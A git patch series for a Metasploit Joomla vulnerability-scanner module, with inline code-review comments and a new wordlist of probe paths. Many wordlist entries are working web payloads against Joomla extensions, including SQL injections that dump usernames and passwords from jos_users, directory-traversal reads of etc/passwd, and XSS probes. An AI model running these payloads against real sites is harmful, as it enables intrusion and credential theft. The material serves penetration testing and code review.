+ if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
+ print_status("#{ip} denied access to #{url} (SSL Required)")
+ elsif(res.body =~ /has a list of IP addresses that are not allowed/)
+ print_status("#{ip} restricted access by IP")
+ elsif(res.body =~ /SSL client certificate is required/)
+ print_status("#{ip} requires a SSL client certificate")
+ else
+ print_status("#{ip} denied access to #{url} #{res.code} #{res.message}")
+ end
+
+ end
+ rescue OpenSSL::SSL::SSLError
+ rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
+ rescue ::Timeout::Error, ::Errno::EPIPE
+ end
+ def scan_pages(tpath,iapp, ip)
+ res = send_request_cgi({
+ 'uri' => tpath+iapp,
+ 'method' => 'GET',
+ }, 5)
+ return if not res or not res.body or not res.code
+ res.body.gsub!(/[\r|\n]/, ' ')
+ if (res.code.to_i == 200)
+ if(res.body =~ /Administration Login/ and res.body =~ /\(\'form-login\'\)\.submit/ or res.body =~/administration console/)
+ sout = "Administrator Login Page"
+ elsif(res.body =~/Registration/ and res.body =~/class="validate">Register<\/button>/)
+ sout = "Registration Page"
+ else
+ sout = iapp
+ end
+ return if not sout
+ if(sout == iapp)
+ print_good("#{iapp}")
+ elsif print_good("#{sout}: #{iapp} ")
+ report_note(
+ :host => ip,
+ :port => datastore['RPORT'],
+ :proto => 'http',
+ :ntype => 'Joomla Pages',
+ :data => sout
+ )
+ end
+ elsif(res.code.to_i == 403 and datastore['VERBOSE'])
+ if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
+ print_status("#{ip} denied access to #{url} (SSL Required)")
+ elsif(res.body =~ /has a list of IP addresses that are not allowed/)
+ print_status("#{ip} restricted access by IP")
+ elsif(res.body =~ /SSL client certificate is required/)
+ print_status("#{ip} requires a SSL client certificate")
+ else
+ print_status("#{ip} denied access to #{url} #{res.code} #{res.message}")
+ end
+ end
+ rescue OpenSSL::SSL::SSLError
+ rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
+ rescue ::Timeout::Error, ::Errno::EPIPE
+ end
+ def plugin_search(tpath,papp, ip, bres)
+ res = send_request_cgi({
+ 'uri' => tpath+papp,
+ 'method' => 'GET',
+ }, 5)
+ return if not res or not res.body or not res.code
+ res.body.gsub!(/[\r|\n]/, ' ')
+ osize = bres.body.size
+ nsize = res.body.size
+ if (res.code.to_i == 200 and res.body !~/#404 Component not found/ and res.body !~/

Joomla! Administration Login<\/h1>/ and osize != nsize)
+ print_good("Found Plugin: #{papp} ")
+ if (papp =~/passwd/ and res.body !~/root/)
+ print_error("\tPasswd not found")
+ elsif(papp =~/passwd/ and res.body =~/root/)
+ print_good("\tPasswd file found in response")
+ elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body =~/SQL syntax/)
+ print_good("\tPossible SQL Injection")
+ elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body !~/SQL syntax/)
+ print_error("\tUnable to identify SQL injection")
+ elsif(papp =~/>alert/ and res.body !~/>alert/)
+ print_error("\tNo XSS")
+ elsif(papp =~/>alert/ and res.body =~/>alert/)
+ print_good("\tPossible XSS")
+ elsif(res.body =~/SQL syntax/ )
+ print_error("\tPossible SQL Injection")
+ elsif(papp =~/com_/)
+ blah = papp.split('_')
+ blah1 = blah[1].gsub('/','')
+ res1 = send_request_cgi({
+ 'uri' => tpath+"index.php?option=com_#{blah1}",
+ 'method' => 'GET',
+ }, 5)
+ if (res1.code.to_i == 200)
+ print_status("\tFound_page: index.php?option=com_#{blah1}")
+ end
+ end
+ report_note(
+ :host => ip,
+ :port => datastore['RPORT'],
+ :proto => 'http',
+ :ntype => 'Plugin Found',
+ :data => papp
+ )
+ elsif(res.code.to_i == 403 and datastore['VERBOSE'])
+ if(res.body =~ /secured with Secure Sockets Layer/ or res.body =~ /Secure Channel Required/ or res.body =~ /requires a secure connection/)
+ print_status("#{ip} denied access to #{url} (SSL Required)")
+ elsif(res.body =~ /has a list of IP addresses that are not allowed/)
+ print_status("#{ip} restricted access by IP")
+ elsif(res.body =~ /SSL client certificate is required/)
+ print_status("#{ip} requires a SSL client certificate")
+ else
+ print_status("#{ip} denied access to #{url} #{res.code} #{res.message}")
+ end
+ end
+
+ rescue OpenSSL::SSL::SSLError
+ rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, 
::ArgumentError + rescue ::Timeout::Error, ::Errno::EPIPE + end + + + +end From 5cfe58e8d508d2889deb808c9e0c9c3f2c4a4a75 Mon Sep 17 00:00:00 2001 From: f8lerror Date: Sun, 20 Jan 2013 22:33:04 -0500 Subject: [PATCH 2/7] General code review and corrections --- .../auxiliary/scanner/http/joomla_vulnscan.rb | 81 ++++++++++--------- 1 file changed, 43 insertions(+), 38 deletions(-) diff --git a/modules/auxiliary/scanner/http/joomla_vulnscan.rb b/modules/auxiliary/scanner/http/joomla_vulnscan.rb index c8cbfbae27..37bfc3d173 100755 --- a/modules/auxiliary/scanner/http/joomla_vulnscan.rb +++ b/modules/auxiliary/scanner/http/joomla_vulnscan.rb @@ -20,9 +20,8 @@ class Metasploit3 < Msf::Auxiliary def initialize super( 'Name' => 'Joomla Scanner', - 'Version' => '$Revision: 14774 $', 'Description' => %q{ - This module scans the Joomla install for information and potential vulnerabilites. + This module scans a Joomla install for information and potential vulnerabilites. }, 'Author' => [ 'f8lerror' ], 'License' => MSF_LICENSE @@ -40,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary ], self.class) end - def osfingerprint(response) + def osfingerprint (response) if(response.headers.has_key?('Server') ) if(response.headers['Server'] =~/Win32/ or response.headers['Server'] =~ /\(Windows/ or response.headers['Server'] =~ /IIS/) os = "Windows" @@ -51,8 +50,9 @@ class Metasploit3 < Msf::Auxiliary end end return os - end - def fingerprint(response, app) + end + + def fingerprint (response, app) if(response.body =~ /(.+)<\/version\/?>/i) v = $1 @@ -87,7 +87,7 @@ class Metasploit3 < Msf::Auxiliary return out end - def run_host(ip) + def run_host (ip) tpath = datastore['PATH'] if tpath[-1,1] != '/' tpath += '/' 
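Review bot: In scan_pages the line `elsif print_good("#{sout}: #{iapp} ")` turns the print call into an elsif condition, so the report_note for 'Joomla Pages' that follows it runs only if print_good happens to return something truthy; this was presumably meant as `else` with `print_good("#{sout}: #{iapp} ")` on the next line. The 403 branches of check_app, scan_pages and plugin_search interpolate `#{url}`, which no method in the file defines, so unless the HttpClient mixin supplies a `url` helper each of those print_status calls raises a NameError that none of the rescue clauses cover; the requested path, e.g. `#{tpath+app}`, is what the message needs. run_host reads the wordlist with `File.open(datastore['PLUGINS'], 'rb').each_line` and never closes the handle; `File.foreach(datastore['PLUGINS']) do |bapp|` iterates the lines and closes it. Parts of fingerprint and the start of run_host are not legible in this rendering, so those were not reviewed.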
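Review bot: The rewritten signature `def osfingerprint (response)` puts a space between the method name and its parameter list; Ruby convention, and the rest of the framework, write `def osfingerprint(response)`. The same spacing is introduced for fingerprint and run_host in the next two hunks and for check_app, scan_pages and plugin_search later in this patch.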
@@ -102,12 +102,12 @@ class Metasploit3 < Msf::Auxiliary apps.each do |app| break if check_app(tpath,app,ip) end - print_status("Scanning for interesting pages") + print_status("Scanning #{ip} for interesting pages") iapps.each do |iapp| scan_pages(tpath,iapp,ip) end if datastore['ENUMERATE'] - print_status("Scanning for plugins") + print_status("Scanning #{ip} for plugins") bres = send_request_cgi({ 'uri' => tpath, 'method' => 'GET', @@ -118,12 +118,13 @@ class Metasploit3 < Msf::Auxiliary papp = bapp.chomp plugin_search(tpath,papp,ip,bres) end - end - end - def check_app(tpath, app, ip) + + end + + def check_app (tpath, app, ip) res = send_request_cgi({ - 'uri' => tpath+app, + 'uri' => "#{datastore['PATH']}" << app, 'method' => 'GET', }, 5) return if not res or not res.body or not res.code @@ -159,13 +160,14 @@ class Metasploit3 < Msf::Auxiliary end end - rescue OpenSSL::SSL::SSLError - rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - rescue ::Timeout::Error, ::Errno::EPIPE + rescue OpenSSL::SSL::SSLError + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + rescue ::Timeout::Error, ::Errno::EPIPE end - def scan_pages(tpath,iapp, ip) + + def scan_pages (tpath, iapp, ip) res = send_request_cgi({ - 'uri' => tpath+iapp, + 'uri' => "#{datastore['PATH']}" << iapp, 'method' => 'GET', }, 5) return if not res or not res.body or not res.code 
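Review bot: Replacing `tpath+app` with `"#{datastore['PATH']}" << app` in check_app drops the trailing-slash normalisation that run_host applies to tpath (`if tpath[-1,1] != '/'` in the previous hunk's context), so a PATH entered without a trailing slash now yields a request like (constructed example) PATH `/joomla` plus `administrator/` becoming `/joomlaadministrator/`, and the tpath parameter is left unused. The same substitution is made for scan_pages in the next hunk and for both requests in plugin_search in the following hunks. Keeping `'uri' => tpath + app` (or `normalize_uri(tpath, app)`, if the HttpClient mixin in this tree provides it) avoids the regression.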
@@ -201,13 +203,14 @@ class Metasploit3 < Msf::Auxiliary print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") end end - rescue OpenSSL::SSL::SSLError - rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - rescue ::Timeout::Error, ::Errno::EPIPE + rescue OpenSSL::SSL::SSLError + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + rescue ::Timeout::Error, ::Errno::EPIPE end - def plugin_search(tpath,papp, ip, bres) + + def plugin_search (tpath, papp, ip, bres) res = send_request_cgi({ - 'uri' => tpath+papp, + 'uri' => "#{datastore['PATH']}" << papp, 'method' => 'GET', }, 5) return if not res or not res.body or not res.code @@ -217,30 +220,32 @@ class Metasploit3 < Msf::Auxiliary if (res.code.to_i == 200 and res.body !~/#404 Component not found/ and res.body !~/

Joomla! Administration Login<\/h1>/ and osize != nsize) print_good("Found Plugin: #{papp} ") if (papp =~/passwd/ and res.body !~/root/) - print_error("\tPasswd not found") + print_error("Passwd not found") elsif(papp =~/passwd/ and res.body =~/root/) - print_good("\tPasswd file found in response") + print_good("Passwd file found in response") elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body =~/SQL syntax/) - print_good("\tPossible SQL Injection") + print_good("Possible SQL Injection") elsif(papp =~/'/ or papp =~/union/ or papp =~/sqli/ or papp =~/-\d/ and papp !~/alert/ and res.body !~/SQL syntax/) - print_error("\tUnable to identify SQL injection") + print_error("Unable to identify SQL injection") elsif(papp =~/>alert/ and res.body !~/>alert/) - print_error("\tNo XSS") + print_error("No XSS") elsif(papp =~/>alert/ and res.body =~/>alert/) - print_good("\tPossible XSS") + print_good("Possible XSS") elsif(res.body =~/SQL syntax/ ) - print_error("\tPossible SQL Injection") + print_good("Possible SQL Injection") elsif(papp =~/com_/) - blah = papp.split('_') - blah1 = blah[1].gsub('/','') + vars = papp.split('_') + pages = vars[1].gsub('/','') res1 = send_request_cgi({ - 'uri' => tpath+"index.php?option=com_#{blah1}", + 'uri' => "#{datastore['PATH']}"<<"index.php?option=com_#{pages}", 'method' => 'GET', }, 5) if (res1.code.to_i == 200) - print_status("\tFound_page: index.php?option=com_#{blah1}") - end + print_good("Found Page: index.php?option=com_#{pages}") + else + print_error("#{datastore['PATH']}"<<"index.php?option=com_#{pages} gave a #{res1.code.to_s} response") end + end report_note( :host => ip, :port => datastore['RPORT'], 
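Review bot: `if (res1.code.to_i == 200)` and the new else branch's `res1.code.to_s` both dereference res1 without checking it, whereas every other send_request_cgi result in the file is guarded with `return if not res or not res.body or not res.code`; those guards assume the call can return nil, and when it does here the resulting NoMethodError is not among the rescued exceptions, so it escapes plugin_search. Changing the test to `if res1 and res1.code.to_i == 200` and the fallback to `elsif res1` lets a nil response fall through to the report_note the way the other requests are handled. plugin_search continues past the end of this hunk.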
@@ -257,12 +262,12 @@ class Metasploit3 < Msf::Auxiliary print_status("#{ip} requires a SSL client certificate") else print_status("#{ip} denied access to #{url} #{res.code} #{res.message}") - end end + end - rescue OpenSSL::SSL::SSLError - rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError - rescue ::Timeout::Error, ::Errno::EPIPE + rescue OpenSSL::SSL::SSLError + rescue Errno::ENOPROTOOPT, Errno::ECONNRESET, ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError + rescue ::Timeout::Error, ::Errno::EPIPE end From 6e94c04a52bc2f90557bffe332abaeb7030051f2 Mon Sep 17 00:00:00 2001 From: f8lerror Date: Wed, 23 Jan 2013 20:26:23 -0500 Subject: [PATCH 3/7] Code Corrections and Enhancements --- data/wordlists/joomla.txt | 627 ++++++++++++++++++ .../auxiliary/scanner/http/joomla_vulnscan.rb | 160 +++-- 2 files changed, 719 insertions(+), 68 deletions(-) create mode 100755 data/wordlists/joomla.txt diff --git a/data/wordlists/joomla.txt b/data/wordlists/joomla.txt new file mode 100755 index 0000000000..b1e651d504 --- /dev/null +++ b/data/wordlists/joomla.txt 
@@ -0,0 +1,627 @@ +&controller=../../../../../../../../../../../../[LFI]%00 +?1.5.10-x +?1.5.11-x-http_ref +?1.5.11-x-php-s3lf +?1.5.3-path-disclose +?1.5.3-spam +?1.5.8-x +?1.5.9-x +?j1012-fixate-session +?option=com_mysms&Itemid=0&task=phonebook +Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png +admin/ +administrator/ +administrator/components/ +administrator/components/com_a6mambocredits/ +administrator/components/com_a6mambohelpdesk/ +administrator/components/com_admin/admin.admin.html.php +administrator/components/com_astatspro/refer.php +administrator/components/com_bayesiannaivefilter/ +administrator/components/com_chronocontact/excelwriter/PPS/File.php +administrator/components/com_colophon/ +administrator/components/com_colorlab/ +administrator/components/com_comprofiler/ +administrator/components/com_comprofiler/plugin.class.php +administrator/components/com_cropimage/admin.cropcanvas.php +administrator/components/com_extplorer/ +administrator/components/com_feederator/includes/tmsp/add_tmsp.php +administrator/components/com_googlebase/ +administrator/components/com_installer +administrator/components/com_jcs/ +administrator/components/com_jim/ +administrator/components/com_jjgallery/ +administrator/components/com_joom12pic/ +administrator/components/com_joomla-visites/ +administrator/components/com_joomla_flash_uploader/ +administrator/components/com_joomlaflashfun/ +administrator/components/com_joomlaradiov5/ +administrator/components/com_jpack/ +administrator/components/com_jreactions/ +administrator/components/com_juser/ +administrator/components/com_admin/ +administrator/components/com_kochsuite / +administrator/components/com_linkdirectory/ +administrator/components/com_livechat/getSavedChatRooms.php +administrator/components/com_livechat/xmlhttp.php +administrator/components/com_lurm_constructor/admin.lurm_constructor.php 
+administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php?name=lo.php"); +administrator/components/com_mambelfish/ +administrator/components/com_mgm/ +administrator/components/com_mmp/help.mmp.php +administrator/components/com_mosmedia/ +administrator/components/com_multibanners/extadminmenus.class.php +administrator/components/com_panoramic/ +administrator/components/com_peoplebook/param.peoplebook.php +administrator/components/com_phpshop/toolbar.phpshop.html.php +administrator/components/com_remository/admin.remository.php +administrator/components/com_serverstat/install.serverstat.php +administrator/components/com_simpleswfupload/uploadhandler.php"); +administrator/components/com_swmenupro/ +administrator/components/com_treeg/ +administrator/components/com_uhp/ +administrator/components/com_uhp2/ +administrator/components/com_webring/ +administrator/components/com_wmtgallery/ +administrator/components/com_wmtportfolio/ +administrator/components/com_x-shop/ +administrator/index.php?option=com_djartgallery&task=editItem&cid[]=1'+and+1=1+--+ +administrator/index.php?option=com_searchlog&act=log +ajaxim/ +akocomments.php +cart?Itemid=[SQLi] +component/com__brightweblinks/ +component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 +component/osproperty/?task=agent_register +component/quran/index.php?option=com_quran&action=viewayat&surano= +components/com_ clickheat/ +components/com_5starhotels/ +components/com_Jambook/jambook.php +components/com_a6mambocredits/ +components/com_a6mambohelpdesk/ +components/com_ab_gallery/ +components/com_acajoom/ +components/com_acctexp/ +components/com_aclassf/ +components/com_activities/ +components/com_actualite/ +components/com_admin/admin.admin.html.php +components/com_advancedpoll/ +components/com_agora/ +components/com_agoragroup/ +components/com_ajaxchat/ +components/com_akobook/ +components/com_akocomment/ +components/com_akogallery 
+components/com_alberghi/ +components/com_allhotels/ +components/com_alphacontent/ +components/com_altas/ +components/com_amocourse/ +components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php +components/com_articles/ +components/com_artist/ +components/com_artlinks/ +components/com_asortyment/ +components/com_astatspro/ +components/com_awesom/ +components/com_babackup/ +components/com_banners/ +components/com_bayesiannaivefilter/ +components/com_be_it_easypartner/ +components/com_beamospetition/ +components/com_biblestudy/ +components/com_biblioteca/views/biblioteca/tmpl/pdf.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +components/com_biblioteca/views/biblioteca/tmpl/stampa.php?pag=1&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +components/com_blog/ +components/com_bookflip/ +components/com_bookjoomlas/ +components/com_booklibrary/ +components/com_books/ +components/com_bsadv/ +components/com_bsq_sitestats/ +components/com_bsq_sitestats/external/rssfeed.php +components/com_bsqsitestats/ +components/com_calendar/ +components/com_camelcitydb2/ +components/com_candle/ +components/com_casino_blackjack/ +components/com_casino_videopoker/ +components/com_casinobase/ +components/com_catalogproduction/ +components/com_catalogshop/ +components/com_category/ +components/com_cgtestimonial/video.php?url="> +components/com_chronocontact/excelwriter/PPS/File.php +components/com_cinema/ +components/com_clasifier/ +components/com_classifieds/ +components/com_clickheat/ +components/com_cloner/ +components/com_cmimarketplace/ +components/com_cms/ +components/com_colophon/ +components/com_colorlab/ +components/com_competitions/ +components/com_comprofiler/ +components/com_comprofiler/plugin.class.php +components/com_contactinfo/ +components/com_content/ +components/com_cpg/cpg.php +components/com_cropimage/admin.cropcanvas.php +components/com_custompages/ +components/com_cx/ 
+components/com_d3000/ +components/com_dadamail/ +components/com_dailymessage/ +components/com_datsogallery/ +components/com_dbquery/ +components/com_detail/ +components/com_digistore/ +components/com_directory/ +components/com_djiceshoutbox/ +components/com_doc/ +components/com_downloads/ +components/com_ds-syndicate/ +components/com_dtregister/ +components/com_dv/externals/phpupload/upload.php"); +components/com_easybook/ +components/com_emcomposer/ +components/com_equotes/ +components/com_estateagent/ +components/com_eventing/ +components/com_eventlist/ +components/com_events/ +components/com_ewriting/ +components/com_expose/uploadimg.php +components/com_expshop/ +components/com_extcalendar/ +components/com_extcalendar/cal_popup.php?extmode=view&extid= +components/com_extcalendar/extcalendar.php +components/com_extended_registration/registration_detailed.inc.php +components/com_extplorer/ +components/com_ezine/ +components/com_ezstore/ +components/com_facileforms/ +components/com_fantasytournament/ +components/com_faq/ +components/com_feederator/includes/tmsp/add_tmsp.php +components/com_filebase/ +components/com_filiale/ +components/com_flashfun/ +components/com_flashmagazinedeluxe/ +components/com_flippingbook/ +components/com_flyspray/startdown.php +components/com_fm/fm.install.php +components/com_foevpartners/ +components/com_football/ +components/com_formtool/ +components/com_forum/ +components/com_fq/ +components/com_fundraiser/ +components/com_galeria/ +components/com_galleria/galleria.html.php +components/com_gallery/ +components/com_game/ +components/com_gameq/ +components/com_garyscookbook/ +components/com_genealogy/ +components/com_geoboerse/ +components/com_gigcal/ +components/com_gmaps/ +components/com_googlebase/ +components/com_gsticketsystem/ +components/com_guide/ +components/com_hashcash/server.php +components/com_hbssearch/ +components/com_hello_world/ +components/com_hotproperties/ +components/com_hotproperty/ +components/com_hotspots/ 
+components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php +components/com_hwdvideoshare/ +components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1"); +components/com_ice/ +components/com_idoblog/ +components/com_idvnews/ +components/com_ignitegallery/ +components/com_ijoomla_archive/ +components/com_ijoomla_rss/ +components/com_inter/ +components/com_ionfiles/ +components/com_is/ +components/com_ixxocart/ +components/com_jabode/ +components/com_jashowcase/ +components/com_jb2/ +components/com_jce/ +components/com_jcs/ +components/com_jd-wiki/ +components/com_jd-wp/ +components/com_jim/ +components/com_jjgallery/ +components/com_jmovies/ +components/com_jobline/ +components/com_jombib/ +components/com_joobb/ +components/com_jooget/ +components/com_joom12pic/ +components/com_joomla-visites/ +components/com_joomla_flash_uploader/ +components/com_joomlaboard/ +components/com_joomladate/ +components/com_joomlaflashfun/ +components/com_joomlalib/ +components/com_joomlaradiov5/ +components/com_joomlavvz/ +components/com_joomlaxplorer/ +components/com_joomloads/ +components/com_joomradio/ +components/com_joomtracker/ +components/com_joovideo/ +components/com_jotloader/ +components/com_journal/ +components/com_jpack/ +components/com_jpad/ +components/com_jreactions/ +components/com_jreviews/scripts/xajax.inc.php +components/com_jumi/ +components/com_juser/ +components/com_jvideo/ +components/com_k2/ +components/com_kbase/ +components/com_knowledgebase/fckeditor/fckeditor.js +components/com_kochsuite / +components/com_kunena/ +components/com_letterman/ +components/com_lexikon/ +components/com_linkdirectory/ +components/com_listoffreeads/ +components/com_livechat/getSavedChatRooms.php +components/com_livechat/xmlhttp.php +components/com_liveticker/ +components/com_lm/ +components/com_lmo/ +components/com_loudmounth/includes/abbc/abbc.class.php +components/com_loudmouth/ +components/com_lowcosthotels/ 
+components/com_lurm_constructor/admin.lurm_constructor.php +components/com_mad4joomla/ +components/com_madeira/img.php +components/com_maianmusic/ +components/com_mailarchive/ +components/com_mailto/ +components/com_mambatstaff/mambatstaff.php +components/com_mambelfish/ +components/com_mambospgm/ +components/com_mambowiki/MamboLogin.php +components/com_marketplace/ +components/com_mcquiz/ +components/com_mdigg/ +components/com_media_library/ +components/com_mediaslide/ +components/com_mezun/ +components/com_mgm/ +components/com_minibb/ +components/com_misterestate/ +components/com_mmp/help.mmp.php +components/com_model/ +components/com_moodle/moodle.php +components/com_moofaq/ +components/com_mosmedia/ +components/com_mospray/scripts/admin.php +components/com_mosres/ +components/com_most/ +components/com_mp3_allopass/ +components/com_mtree/ +components/com_mtree/img/listings/o/{id}.php +components/com_multibanners/extadminmenus.class.php +components/com_myalbum/ +components/com_mycontent/ +components/com_mydyngallery/ +components/com_mygallery/ +components/com_n-forms/ +components/com_na_content/ +components/com_na_mydocs/ +components/com_na_newsdescription/ +components/com_na_qforms/ +components/com_neogallery/ +components/com_neorecruit/ +components/com_neoreferences/ +components/com_netinvoice/ +components/com_news/ +components/com_news_portal/ +components/com_newsflash/ +components/com_nfn_addressbook/ +components/com_nicetalk/ +components/com_noticias/ +components/com_omnirealestate/ +components/com_omphotogallery/ +components/com_ongumatimesheet20/ +components/com_onlineflashquiz/ +components/com_ownbiblio/ +components/com_panoramic/ +components/com_paxgallery/ +components/com_paxxgallery/ +components/com_pcchess/ +components/com_pcchess/include.pcchess.php +components/com_pccookbook/ +components/com_pccookbook/pccookbook.php +components/com_peoplebook/param.peoplebook.php +components/com_performs/ +components/com_philaform/ 
+components/com_phocadocumentation/ +components/com_php/ +components/com_phpshop/toolbar.phpshop.html.php +components/com_pinboard/ +components/com_pms/ +components/com_poll/ +components/com_pollxt/ +components/com_ponygallery/ +components/com_portafolio/ +components/com_portfol/ +components/com_prayercenter/ +components/com_pro_desk/ +components/com_prod/ +components/com_productshowcase/ +components/com_profiler/ +components/com_projectfork/ +components/com_propertylab/ +components/com_puarcade/ +components/com_publication/ +components/com_quiz/ +components/com_rapidrecipe/ +components/com_rdautos/ +components/com_realestatemanager/ +components/com_recly/ +components/com_referenzen/ +components/com_rekry/ +components/com_remository/admin.remository.php +components/com_remository_files/file_image_14/1276100016shell.php +components/com_reporter/processor/reporter.sql.php +components/com_resman/ +components/com_restaurante/ +components/com_ricette/ +components/com_rsfiles/ +components/com_rsgallery/ +components/com_rsgallery2/ +components/com_rss/ +components/com_rssreader/ +components/com_rssxt/ +components/com_rwcards/ +components/com_school/ +components/com_search/ +components/com_sebercart/getPic.php?p=[LFD]%00 +components/com_securityimages/ +components/com_sef/ +components/com_seminar/ +components/com_serverstat/install.serverstat.php +components/com_sg/ +components/com_simple_review/ +components/com_simpleboard/ +components/com_simplefaq/ +components/com_simpleshop/ +components/com_sitemap/sitemap.xml.php +components/com_slideshow/ +components/com_smf/ +components/com_smf/smf.php +components/com_swmenupro/ +components/com_team/ +components/com_tech_article/ +components/com_thopper/ +components/com_thyme/ +components/com_tickets/ +components/com_tophotelmodule/ +components/com_tour_toto/ +components/com_trade/ +components/com_uhp/ +components/com_uhp2/ +components/com_user/controller.php +components/com_users/ 
+components/com_utchat/pfc/lib/pear/PHPUnit/GUI/Gtk.php +components/com_vehiclemanager/ +components/com_versioning / +components/com_videodb/core/videodb.class.xml.php +components/com_virtuemart/ +components/com_volunteer/ +components/com_vr/ +components/com_waticketsystem/ +components/com_webhosting/ +components/com_weblinks/ +components/com_webring/ +components/com_wmtgallery/ +components/com_wmtportfolio/ +components/com_x-shop/ +components/com_xevidmegahd/ +components/com_xewebtv/ +components/com_xfaq/ +components/com_xgallery/helpers/img.php?file= +components/com_xsstream-dm/ +components/com_ynews/ +components/com_yvcomment/ +components/com_zoom/classes/ +components/mod_letterman/ +components/remository/ +eXtplorer/ +easyblog/entry/uncategorized +extplorer/ +components/com_mtree/img/listings/o/{id}.php where {id} +includes/joomla.php +index.php/404' +index.php/?option=com_question&catID=21' and+1=0 union all +index.php/image-gallery/">/25-koala +index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&type=css&v=1 +index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view +index.php?option=com_aardvertiser&cat_name=conf&task=<= +index.php?option=com_aardvertiser&task= +index.php?option=com_abc&view=abc&letter=AS§ionid=' +index.php?option=com_advert&id=36' +index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users-- +index.php?option=com_alfurqan15x&action=viewayat&surano= +index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version +index.php?option=com_annonces&view=edit&Itemid=1 +index.php?option=com_articleman&task=new +index.php?option=com_bbs&bid=-1 +index.php?option=com_beamospetition&startpage=3&pet=- +index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users- +index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27 
+index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23 +index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1 +index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users-- +index.php?option=com_chronoconnectivity&itemid=1 +index.php?option=com_chronocontact&itemid=1 +index.php?option=com_cinema&Itemid=S@BUN&func=detail&id= +index.php?option=com_clantools&squad=1+ +index.php?option=com_clantools&task=clanwar&showgame=1+ +index.php?option=com_commedia&format=raw&task=image&pid=4&id=964' +index.php?option=com_commedia&task=page&commpid=21 +index.php?option=com_connect&view=connect&controller= +index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../ +index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00 +index.php?option=com_dioneformwizard&controller=[LFI]%00 +index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1 +index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 +index.php?option=com_easyfaq&Itemid=1&task=view&gid= +index.php?option=com_easyfaq&catid=1&task=view&id=-2527+ +index.php?option=com_easyfaq&task=view&contact_id= +index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id= +index.php?option=com_equipment&task=components&id=45&sec_men_id= +index.php?option=com_equipment&view=details&id= +index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli] +index.php?option=com_etree&view=displays&layout=category&id=[SQL] +index.php?option=com_etree&view=displays&layout=user&user_id=[SQL] 
+index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1
+index.php?option=com_fabrik&view=table&tableid=13+union+select+1----
+index.php?option=com_filecabinet&task=download&cid[]=7
+index.php?option=com_firmy&task=section_show_set&Id=-1
+index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
+index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id=
+index.php?option=com_graphics&controller=
+index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search=
+index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp=
